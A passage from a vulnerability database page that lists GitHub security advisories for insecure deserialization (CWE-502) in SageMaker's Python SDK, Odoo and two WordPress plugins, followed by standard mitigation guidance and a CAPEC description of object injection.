  "details": "### Impact\n\nsagemaker.base_deserializers.NumpyDeserializer module before v2.218.0 allows potentially unsafe deserialization when untrusted data is passed as pickled object arrays. This consequently may allow an unprivileged third party to cause remote code execution, denial of service, affecting both confidentiality and integrity.\n\nImpacted versions: \u003c2.218.0.\n\n### Credit \n\nWe would like to thank HiddenLayer for collaborating on this issue through the coordinated vulnerability disclosure process.\n\n\n### Workarounds\n\nDo not pass pickled numpy object arrays which originated from an untrusted source, or that could have been tampered with. Only pass pickled numpy object arrays from sources you trust.\n\n\n### References\n\nIf you have any questions or comments about this advisory we ask that you contact AWS/Amazon Security via our vulnerability reporting page [1] or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.\n[1] Vulnerability reporting page: https://aws.amazon.com/security/vulnerability-reporting\n\nFixed by: [https://github.com/aws/sagemaker-python-sdk/pull/4557](https://github.com/aws/sagemaker-python-sdk/pull/4557)",
  "id": "GHSA-wjvx-jhpj-r54r",
  "modified": "2024-05-03T20:25:33Z",
  "published": "2024-05-03T20:25:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/aws/sagemaker-python-sdk/security/advisories/GHSA-wjvx-jhpj-r54r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34072"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aws/sagemaker-python-sdk/pull/4557"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aws/sagemaker-python-sdk/commit/72e0c9712aec6fbb82fb40fda091dfc2a42c70a0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/aws/sagemaker-python-sdk"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "sagemaker-python-sdk vulnerable to Deserialization of Untrusted Data"
}

GHSA-WM87-G64H-3474

Vulnerability from github – Published: 2024-03-28 06:30 – Updated: 2026-04-28 21:34
VLAI
Details

Deserialization of Untrusted Data vulnerability in INFINITUM FORM Geo Controller.This issue affects Geo Controller: from n/a through 8.6.4.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-30227"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-28T05:15:50Z",
    "severity": "CRITICAL"
  },
  "details": "Deserialization of Untrusted Data vulnerability in INFINITUM FORM Geo Controller.This issue affects Geo Controller: from n/a through 8.6.4.",
  "id": "GHSA-wm87-g64h-3474",
  "modified": "2026-04-28T21:34:21Z",
  "published": "2024-03-28T06:30:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30227"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/cf-geoplugin/wordpress-geo-controller-plugin-8-6-4-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WM9R-8VRH-FGPV

Vulnerability from github – Published: 2022-05-13 01:41 – Updated: 2022-05-13 01:41
VLAI
Details

In Odoo 8.0, Odoo Community Edition 9.0 and 10.0, and Odoo Enterprise Edition 9.0 and 10.0, insecure handling of anonymization data in the Database Anonymization module allows remote authenticated privileged users to execute arbitrary Python code, because unpickle is used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-10803"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-07-04T18:29:00Z",
    "severity": "HIGH"
  },
  "details": "In Odoo 8.0, Odoo Community Edition 9.0 and 10.0, and Odoo Enterprise Edition 9.0 and 10.0, insecure handling of anonymization data in the Database Anonymization module allows remote authenticated privileged users to execute arbitrary Python code, because unpickle is used.",
  "id": "GHSA-wm9r-8vrh-fgpv",
  "modified": "2022-05-13T01:41:57Z",
  "published": "2022-05-13T01:41:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-10803"
    },
    {
      "type": "WEB",
      "url": "https://github.com/odoo/odoo/issues/17898"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WMG4-PFMH-HXH4

Vulnerability from github – Published: 2025-08-20 03:30 – Updated: 2025-08-20 03:30
VLAI
Details

The Redirection for Contact Form 7 plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.2.4 via deserialization of untrusted input in the delete_associated_files function. This makes it possible for unauthenticated attackers to inject a PHP Object. This vulnerability may be exploited by unauthenticated attackers when a form is present on the site with a file upload action, and doesn't affect sites with PHP version > 8. This vulnerability also requires the 'Redirection For Contact Form 7 Extension - Create Post' extension to be installed and activated in order to be exploited. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. We confirmed there is a usable gadget in Contact Form 7 plugin that makes arbitrary file deletion possible when installed with this plugin. Given Contact Form 7 is a requirement of this plugin, it is likely that any site with this plugin and the 'Redirection For Contact Form 7 Extension - Create Post' extension enabled is vulnerable to arbitrary file deletion.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-8289"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-20T03:15:36Z",
    "severity": "HIGH"
  },
  "details": "The Redirection for Contact Form 7 plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.2.4 via deserialization of untrusted input in the delete_associated_files function. This makes it possible for unauthenticated attackers to inject a PHP Object. This vulnerability may be exploited by unauthenticated attackers when a form is present on the site with a file upload action, and doesn\u0027t affect sites with PHP version \u003e 8. This vulnerability also requires the \u0027Redirection For Contact Form 7 Extension - Create Post\u0027 extension to be installed and activated in order to be exploited. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. We confirmed there is a usable gadget in Contact Form 7 plugin that makes arbitrary file deletion possible when installed with this plugin. Given Contact Form 7 is a requirement of this plugin, it is likely that any site with this plugin and the \u0027Redirection For Contact Form 7 Extension - Create Post\u0027 extension enabled is vulnerable to arbitrary file deletion.",
  "id": "GHSA-wmg4-pfmh-hxh4",
  "modified": "2025-08-20T03:30:21Z",
  "published": "2025-08-20T03:30:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8289"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/wpcf7-redirect/tags/3.2.4/classes/class-wpcf7r-save-files.php#L80"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7909b75-8087-4d38-8325-c619bf84d997?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design Implementation

If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.

Mitigation
Implementation

When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Mitigation
Implementation

Explicitly define a final object() to prevent deserialization.

Mitigation
Architecture and Design Implementation
  • Make fields transient to protect them from deserialization.
  • An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Implementation

Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.

Mitigation
Architecture and Design Implementation

Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-586: Object Injection

An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.